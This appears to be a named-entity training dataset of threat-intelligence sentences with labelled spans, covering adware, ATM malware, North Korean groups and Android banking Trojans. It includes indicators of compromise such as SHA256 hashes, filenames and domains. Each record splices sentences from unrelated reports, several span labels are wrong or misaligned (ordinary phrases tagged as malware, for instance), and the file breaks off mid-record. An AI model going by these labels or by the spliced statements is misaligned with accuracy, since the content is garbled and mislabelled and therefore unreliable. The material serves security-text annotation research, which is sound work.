SHA256 : 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 .", "spans": [{"start": 34, "end": 38, "label": "Malware"}, {"start": 39, "end": 77, "label": "Malware"}, {"start": 184, "end": 248, "label": "Indicator"}]} {"text": "YouTube channel of the malicious developer His YouTube channel provided us with another valuable piece of information : he himself features in a video tutorial for one of his other projects . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Filename: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 47, "end": 54, "label": "System"}, {"start": 281, "end": 289, "label": "Malware"}, {"start": 294, "end": 301, "label": "Malware"}, {"start": 329, "end": 339, "label": "Malware"}, {"start": 344, "end": 351, "label": "Malware"}, {"start": 401, "end": 480, "label": "Indicator"}]} {"text": "Thanks to that project , we were able to extract his Facebook profile \u2013 which lists his studies at the aforementioned university . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor . SHA256 : 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b .", "spans": [{"start": 53, "end": 61, "label": "Organization"}, {"start": 280, "end": 288, "label": "Malware"}, {"start": 300, "end": 364, "label": "Indicator"}]} {"text": "Figure 12 . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . 
Filename: adobe distillist.lnk .", "spans": [{"start": 60, "end": 64, "label": "Malware"}, {"start": 69, "end": 76, "label": "Malware"}, {"start": 120, "end": 140, "label": "Indicator"}]} {"text": "Facebook profile of the C & C domain registrar ( cover picture and profile picture edited out ) Linked on the malicious developer \u2019 s Facebook profile , we discovered a Facebook page , Minigameshouse , and an associated domain , minigameshouse [ . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . SHA256 : 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 169, "end": 177, "label": "Organization"}, {"start": 185, "end": 199, "label": "Indicator"}, {"start": 229, "end": 247, "label": "Indicator"}, {"start": 324, "end": 332, "label": "Malware"}, {"start": 350, "end": 362, "label": "Malware"}, {"start": 365, "end": 372, "label": "Malware"}, {"start": 421, "end": 485, "label": "Indicator"}]} {"text": "] net . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER\u201d identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Filename: winload.exe .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 54, "end": 65, "label": "Malware"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 296, "end": 307, "label": "Indicator"}]} {"text": "This domain is similar to the one the malware author used for his adware C & C communication , minigameshouse [ . 
RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . SHA256 : dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d .", "spans": [{"start": 95, "end": 113, "label": "Indicator"}, {"start": 114, "end": 120, "label": "Malware"}, {"start": 121, "end": 143, "label": "Malware"}, {"start": 263, "end": 327, "label": "Indicator"}]} {"text": "] us . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Filename: winload.dll .", "spans": [{"start": 7, "end": 13, "label": "Malware"}, {"start": 19, "end": 26, "label": "Malware"}, {"start": 84, "end": 95, "label": "Organization"}, {"start": 105, "end": 135, "label": "Malware"}, {"start": 160, "end": 171, "label": "Indicator"}]} {"text": "Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse [ . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Pactchfilepacks.net23.net . checkmail.phpnet.us .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 96, "end": 114, "label": "Indicator"}, {"start": 120, "end": 127, "label": "Malware"}, {"start": 150, "end": 186, "label": "Malware"}, {"start": 191, "end": 220, "label": "Malware"}, {"start": 250, "end": 275, "label": "Indicator"}, {"start": 278, "end": 297, "label": "Indicator"}]} {"text": "] us domain : the phone number registered with this domain is the same as the phone number appearing on the Facebook page . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . 
Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": [{"start": 108, "end": 116, "label": "Organization"}, {"start": 167, "end": 172, "label": "Malware"}, {"start": 198, "end": 207, "label": "Malware"}, {"start": 281, "end": 288, "label": "Organization"}]} {"text": "Figure 13 . Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": [{"start": 67, "end": 74, "label": "Malware"}, {"start": 96, "end": 106, "label": "Malware"}, {"start": 168, "end": 183, "label": "Malware"}, {"start": 232, "end": 243, "label": "Organization"}]} {"text": "Facebook page managed by the C & C domain registrant uses the same base domain name ( minigameshouse ) and phone number as the registered malicious C & C used by the Ashas adware Of interest is that on the Minigameshouse Facebook page , the malicious developer promotes a slew of games beyond the Ashas family for download on both Google Play and the App Store . FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . Feedback from our Smart Protection Network revealed that apart from attacks in North America ( mainly the U.S. 
) , Europe , and South America , the campaign also noticeably affected enterprises in Taiwan , Hong Kong , China , and Bahrain .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 166, "end": 171, "label": "Malware"}, {"start": 221, "end": 229, "label": "Organization"}, {"start": 297, "end": 302, "label": "Malware"}, {"start": 331, "end": 342, "label": "System"}, {"start": 351, "end": 360, "label": "System"}, {"start": 363, "end": 370, "label": "Organization"}, {"start": 431, "end": 438, "label": "Malware"}, {"start": 448, "end": 457, "label": "Malware"}, {"start": 465, "end": 474, "label": "Malware"}, {"start": 541, "end": 565, "label": "Organization"}, {"start": 705, "end": 716, "label": "Organization"}]} {"text": "However , all of those have been removed from Google Play \u2013 despite the fact that some of them didn \u2019 t contain any adware functionality . The samples we identified target the ATM vendor Diebold . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 143, "end": 150, "label": "Malware"}, {"start": 176, "end": 194, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 262, "end": 274, "label": "Organization"}, {"start": 295, "end": 309, "label": "Organization"}, {"start": 314, "end": 337, "label": "Organization"}]} {"text": "On top of all this , one of the malicious developer \u2019 s YouTube videos \u2013 a tutorial on developing an \u201c Instant Game \u201d for Facebook \u2013 serves as an example of operational security completely ignored . This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat . 
On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": [{"start": 56, "end": 63, "label": "System"}, {"start": 122, "end": 130, "label": "Organization"}, {"start": 283, "end": 292, "label": "Malware"}, {"start": 310, "end": 319, "label": "Organization"}, {"start": 397, "end": 428, "label": "Organization"}, {"start": 471, "end": 483, "label": "Organization"}, {"start": 504, "end": 518, "label": "Organization"}, {"start": 523, "end": 546, "label": "Organization"}]} {"text": "We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits \u2013 4 digits) and the number of cycles (billCount \u2013 2 digits) to repeat the dispensing operation (see Figure 10) . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": [{"start": 61, "end": 72, "label": "System"}, {"start": 112, "end": 124, "label": "Malware"}, {"start": 127, "end": 136, "label": "Malware"}, {"start": 153, "end": 162, "label": "Organization"}, {"start": 458, "end": 463, "label": "System"}, {"start": 466, "end": 479, "label": "Vulnerability"}, {"start": 482, "end": 495, "label": "Vulnerability"}, {"start": 502, "end": 515, "label": "Vulnerability"}]} {"text": "He also used his email account to log into various services in the video , which identifies him as the adware domain owner , beyond any doubt . Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . 
In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system .", "spans": [{"start": 144, "end": 153, "label": "Malware"}, {"start": 226, "end": 244, "label": "Malware"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 383, "end": 391, "label": "Malware"}, {"start": 392, "end": 399, "label": "Malware"}]} {"text": "Thanks to the video , we were even able to identify three further apps that contained adware functionality and were available on Google Play . Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 .", "spans": [{"start": 129, "end": 140, "label": "System"}, {"start": 149, "end": 158, "label": "Malware"}, {"start": 231, "end": 240, "label": "Malware"}, {"start": 282, "end": 293, "label": "Organization"}, {"start": 363, "end": 371, "label": "Malware"}]} {"text": "Figure 14 . The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 211, "end": 223, "label": "Organization"}]} {"text": "Screenshots from this developer \u2019 s YouTube video shows history of checking Ashas adware on Google Play ESET telemetry Figure 15 . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . 
The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": [{"start": 36, "end": 43, "label": "System"}, {"start": 76, "end": 81, "label": "Malware"}, {"start": 92, "end": 103, "label": "System"}, {"start": 104, "end": 108, "label": "Organization"}, {"start": 135, "end": 147, "label": "Malware"}, {"start": 252, "end": 260, "label": "Malware"}, {"start": 282, "end": 289, "label": "Vulnerability"}, {"start": 317, "end": 330, "label": "Vulnerability"}, {"start": 343, "end": 351, "label": "Organization"}]} {"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ? We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 19, "end": 42, "label": "Malware"}, {"start": 163, "end": 175, "label": "Malware"}, {"start": 238, "end": 246, "label": "Malware"}, {"start": 299, "end": 307, "label": "Malware"}, {"start": 345, "end": 353, "label": "Organization"}]} {"text": "Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet . 
Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants .", "spans": [{"start": 237, "end": 248, "label": "Malware"}, {"start": 267, "end": 280, "label": "Malware"}, {"start": 281, "end": 287, "label": "Malware"}, {"start": 290, "end": 298, "label": "Malware"}, {"start": 325, "end": 356, "label": "Organization"}]} {"text": "When installed on a device , apps containing adware may , among other things : Annoy users with intrusive advertisements , including scam ads Waste the device \u2019 s battery resources Generate increased network traffic Gather users \u2019 personal information Hide their presence on the affected device to achieve persistence Generate revenue for their operator without any user interaction Conclusion Based solely on open source intelligence , we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps . Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) .", "spans": [{"start": 480, "end": 485, "label": "Malware"}, {"start": 575, "end": 583, "label": "Malware"}, {"start": 676, "end": 685, "label": "Malware"}, {"start": 807, "end": 830, "label": "Organization"}]} {"text": "Seeing that the developer did not take any measures to protect his identity , it seems likely that his intentions weren \u2019 t dishonest at first \u2013 and this is also supported by the fact that not all his published apps contained unwanted ads . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . 
Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": [{"start": 241, "end": 251, "label": "System"}, {"start": 322, "end": 330, "label": "System"}, {"start": 339, "end": 352, "label": "Malware"}, {"start": 415, "end": 424, "label": "Indicator"}, {"start": 434, "end": 439, "label": "System"}, {"start": 440, "end": 447, "label": "Vulnerability"}, {"start": 509, "end": 516, "label": "Vulnerability"}, {"start": 520, "end": 530, "label": "System"}]} {"text": "At some point in his Google Play \u201c career \u201d , he apparently decided to increase his ad revenue by implementing adware functionality in his apps \u2019 code . One of them \u2013 ipv4.dll \u2013 has been placed by the APT with what is , in fact , a downloader for other malicious components . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": [{"start": 21, "end": 32, "label": "System"}, {"start": 167, "end": 175, "label": "Malware"}, {"start": 232, "end": 242, "label": "System"}, {"start": 321, "end": 351, "label": "Indicator"}, {"start": 370, "end": 390, "label": "Malware"}, {"start": 393, "end": 396, "label": "Malware"}]} {"text": "The various stealth and resilience techniques implemented in the adware show us that the culprit was aware of the malicious nature of the added functionality and attempted to keep it hidden . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . 
This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data .", "spans": [{"start": 221, "end": 236, "label": "Malware"}, {"start": 237, "end": 257, "label": "Malware"}, {"start": 340, "end": 369, "label": "Malware"}]} {"text": "Sneaking unwanted or harmful functionality into popular , benign apps is a common practice among \u201c bad \u201d developers , and we are committed to tracking down such apps . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system .", "spans": [{"start": 231, "end": 236, "label": "Malware"}, {"start": 251, "end": 265, "label": "System"}, {"start": 268, "end": 275, "label": "Malware"}, {"start": 281, "end": 296, "label": "Malware"}]} {"text": "We report them to Google and take other steps to disrupt malicious campaigns we discover . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 119, "end": 139, "label": "Organization"}, {"start": 181, "end": 214, "label": "Malware"}, {"start": 234, "end": 247, "label": "Vulnerability"}, {"start": 366, "end": 373, "label": "Malware"}, {"start": 397, "end": 416, "label": "Organization"}, {"start": 432, "end": 444, "label": "Malware"}]} {"text": "Last but not least , we publish our findings to help Android users protect themselves . 
Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries .", "spans": [{"start": 53, "end": 60, "label": "System"}, {"start": 167, "end": 180, "label": "Vulnerability"}, {"start": 192, "end": 206, "label": "Malware"}, {"start": 231, "end": 250, "label": "Organization"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 284, "end": 291, "label": "Malware"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 343, "end": 353, "label": "Organization"}, {"start": 360, "end": 376, "label": "Organization"}]} {"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan \u2013 banker and ransomware 22 NOV 2018 On Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . 
Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 169, "end": 180, "label": "System"}, {"start": 491, "end": 497, "label": "Malware"}, {"start": 551, "end": 559, "label": "Organization"}, {"start": 594, "end": 601, "label": "System"}, {"start": 619, "end": 632, "label": "Malware"}, {"start": 636, "end": 645, "label": "Malware"}, {"start": 732, "end": 752, "label": "Malware"}, {"start": 811, "end": 818, "label": "Malware"}]} {"text": "the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories .", "spans": [{"start": 157, "end": 163, "label": "Malware"}, {"start": 166, "end": 172, "label": "Malware"}, {"start": 234, "end": 239, "label": "System"}, {"start": 244, "end": 250, "label": "System"}, {"start": 383, "end": 398, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}]} {"text": "One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . 
In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": [{"start": 86, "end": 92, "label": "Malware"}, {"start": 111, "end": 126, "label": "System"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 203, "end": 213, "label": "Malware"}, {"start": 333, "end": 359, "label": "Organization"}, {"start": 369, "end": 386, "label": "Indicator"}]} {"text": "In a three-month period from August to October 2018 , it launched over 70,000 attacks against users located primarily in Russia . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": [{"start": 140, "end": 145, "label": "Organization"}, {"start": 244, "end": 255, "label": "Malware"}, {"start": 315, "end": 323, "label": "Organization"}, {"start": 344, "end": 351, "label": "Malware"}, {"start": 420, "end": 440, "label": "System"}, {"start": 443, "end": 447, "label": "Indicator"}]} {"text": "An interesting feature of this family of banking Trojans is the simultaneous use of three command sources : Google Cloud Messaging ( GCM ) service \u2013 used to send small messages in JSON format to a mobile device via Google servers ; malicious C & C server ; incoming SMS messages . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . 
Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service .", "spans": [{"start": 291, "end": 296, "label": "Organization"}, {"start": 395, "end": 406, "label": "Malware"}, {"start": 411, "end": 425, "label": "Organization"}]} {"text": "This \u2018 versatility \u2019 was present in the first version of Rotexy and has been a feature of all the family \u2019 s subsequent representatives . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL .", "spans": [{"start": 57, "end": 63, "label": "Malware"}, {"start": 168, "end": 173, "label": "Organization"}, {"start": 201, "end": 213, "label": "Organization"}, {"start": 233, "end": 254, "label": "Organization"}, {"start": 263, "end": 277, "label": "Malware"}, {"start": 350, "end": 371, "label": "Organization"}, {"start": 387, "end": 402, "label": "Organization"}, {"start": 414, "end": 417, "label": "Organization"}, {"start": 422, "end": 425, "label": "Organization"}, {"start": 437, "end": 443, "label": "Malware"}, {"start": 444, "end": 451, "label": "Malware"}, {"start": 518, "end": 533, "label": "Organization"}]} {"text": "During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014 . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . 
The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP PROT 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 249, "end": 263, "label": "Malware"}, {"start": 337, "end": 359, "label": "Malware"}, {"start": 363, "end": 369, "label": "Malware"}, {"start": 404, "end": 406, "label": "System"}, {"start": 428, "end": 431, "label": "Indicator"}, {"start": 484, "end": 503, "label": "Indicator"}, {"start": 506, "end": 509, "label": "Indicator"}, {"start": 536, "end": 550, "label": "Organization"}]} {"text": "Back then it was detected as Trojan-Spy.AndroidOS.SmsThief , but later versions were assigned to another family \u2013 Trojan-Banker.AndroidOS.Rotexy . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity .", "spans": [{"start": 29, "end": 58, "label": "Malware"}, {"start": 114, "end": 144, "label": "Malware"}, {"start": 157, "end": 170, "label": "Organization"}, {"start": 251, "end": 266, "label": "Malware"}, {"start": 307, "end": 310, "label": "Organization"}, {"start": 315, "end": 318, "label": "Organization"}]} {"text": "The modern version of Rotexy combines the functions of a banking Trojan and ransomware . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets . 
The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 99, "end": 112, "label": "Organization"}, {"start": 223, "end": 238, "label": "Malware"}, {"start": 300, "end": 308, "label": "Malware"}, {"start": 339, "end": 346, "label": "Organization"}]} {"text": "It spreads under the name AvitoPay.apk ( or similar ) and downloads from websites with names like youla9d6h.tk , prodam8n9.tk , prodamfkz.ml , avitoe0ys.tk , etc . Carbanak is a backdoor used by the attackers to compromise the victim . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL\u2013A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form\u2014a version that other researchers also recently identified .", "spans": [{"start": 26, "end": 38, "label": "Indicator"}, {"start": 98, "end": 110, "label": "Indicator"}, {"start": 113, "end": 125, "label": "Indicator"}, {"start": 128, "end": 140, "label": "Indicator"}, {"start": 143, "end": 155, "label": "Indicator"}, {"start": 164, "end": 172, "label": "Malware"}, {"start": 178, "end": 186, "label": "System"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 254, "end": 262, "label": "Malware"}, {"start": 273, "end": 293, "label": "Malware"}, {"start": 336, "end": 353, "label": "Malware"}]} {"text": "These website names are generated according to a clear algorithm : the first few letters are suggestive of popular classified ad services , followed by a random string of characters , followed by a two-letter top-level domain . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . 
Around 55% of the victims of Lazarus were located in India and neighboring countries .", "spans": [{"start": 292, "end": 316, "label": "Malware"}, {"start": 328, "end": 341, "label": "Vulnerability"}, {"start": 373, "end": 380, "label": "Organization"}]} {"text": "But before we go into the details of what the latest version of Rotexy can do and why it \u2019 s distinctive , we would like to give a summary of the path the Trojan has taken since 2014 up to the present day . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks .", "spans": [{"start": 64, "end": 70, "label": "Malware"}, {"start": 227, "end": 240, "label": "System"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 321, "end": 329, "label": "Organization"}, {"start": 332, "end": 345, "label": "Organization"}, {"start": 427, "end": 449, "label": "Organization"}]} {"text": "Evolution of Rotexy 2014\u20132015 Since the malicious program was detected in 2014 , its main functions and propagation method have not changed : Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics . 
Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks\u2014such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank\u2014in recent history .", "spans": [{"start": 13, "end": 19, "label": "Malware"}, {"start": 142, "end": 148, "label": "Malware"}, {"start": 354, "end": 360, "label": "System"}, {"start": 389, "end": 413, "label": "Malware"}, {"start": 581, "end": 591, "label": "Organization"}, {"start": 607, "end": 613, "label": "Organization"}]} {"text": "As it launches , it requests device administrator rights , and then starts communicating with its C & C server . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . It 's possible that Lazarus is using RATANKBA to target larger organizations .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 143, "end": 170, "label": "Vulnerability"}, {"start": 173, "end": 186, "label": "Vulnerability"}, {"start": 232, "end": 246, "label": "Malware"}, {"start": 249, "end": 262, "label": "Vulnerability"}, {"start": 269, "end": 285, "label": "System"}, {"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 326, "end": 333, "label": "Organization"}, {"start": 343, "end": 351, "label": "Malware"}]} {"text": "Until mid-2015 , Rotexy used a plain-text JSON format to communicate with its C & C . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . 
RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders .", "spans": [{"start": 17, "end": 23, "label": "Malware"}, {"start": 100, "end": 109, "label": "Malware"}, {"start": 122, "end": 130, "label": "System"}, {"start": 159, "end": 167, "label": "Malware"}, {"start": 242, "end": 268, "label": "Malware"}, {"start": 281, "end": 290, "label": "Malware"}]} {"text": "The C & C address was specified in the code and was also unencrypted : In some versions , a dynamically generated low-level domain was used as an address : In its first communication , the Trojan sent the infected device \u2019 s IMEI to the C & C , and in return it received a set of rules for processing incoming SMSs ( phone numbers , keywords and regular expressions ) \u2013 these applied mainly to messages from banks , payment systems and mobile network operators . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses .", "spans": [{"start": 477, "end": 486, "label": "Malware"}, {"start": 495, "end": 507, "label": "Organization"}, {"start": 530, "end": 539, "label": "System"}, {"start": 616, "end": 623, "label": "Organization"}, {"start": 642, "end": 648, "label": "Organization"}, {"start": 665, "end": 679, "label": "Organization"}]} {"text": "For instance , the Trojan could automatically reply to an SMS and immediately delete it . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . 
simultaneous use of the detected Win32/KillDisk.NBO variants .", "spans": [{"start": 94, "end": 125, "label": "Organization"}, {"start": 163, "end": 185, "label": "Malware"}, {"start": 256, "end": 274, "label": "Malware"}]} {"text": "Rotexy then sent information about the smartphone to the C & C , including the phone model , number , name of the mobile network operator , versions of the operating system and IMEI . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government \u2013 commonly known as HARDRAIN .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 198, "end": 207, "label": "Malware"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 251, "end": 260, "label": "System"}, {"start": 276, "end": 291, "label": "Organization"}, {"start": 303, "end": 306, "label": "Organization"}, {"start": 311, "end": 314, "label": "Organization"}, {"start": 326, "end": 332, "label": "Malware"}, {"start": 333, "end": 340, "label": "Malware"}, {"start": 406, "end": 414, "label": "Malware"}]} {"text": "With each subsequent request , a new subdomain was generated . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections .", "spans": [{"start": 67, "end": 98, "label": "Organization"}, {"start": 136, "end": 158, "label": "Malware"}, {"start": 304, "end": 308, "label": "Malware"}, {"start": 346, "end": 348, "label": "System"}]} {"text": "The algorithm for generating the lowest-level domain name was hardwired in the Trojan \u2019 s code . 
Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America .", "spans": [{"start": 97, "end": 106, "label": "Malware"}, {"start": 116, "end": 129, "label": "Vulnerability"}, {"start": 239, "end": 246, "label": "Organization"}, {"start": 274, "end": 297, "label": "Organization"}]} {"text": "The Trojan also registered in Google Cloud Messaging ( GCM ) , meaning it could then receive commands via that service . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America .", "spans": [{"start": 30, "end": 60, "label": "System"}, {"start": 166, "end": 196, "label": "Malware"}, {"start": 215, "end": 235, "label": "System"}, {"start": 238, "end": 241, "label": "System"}, {"start": 279, "end": 286, "label": "Organization"}, {"start": 337, "end": 348, "label": "Organization"}, {"start": 352, "end": 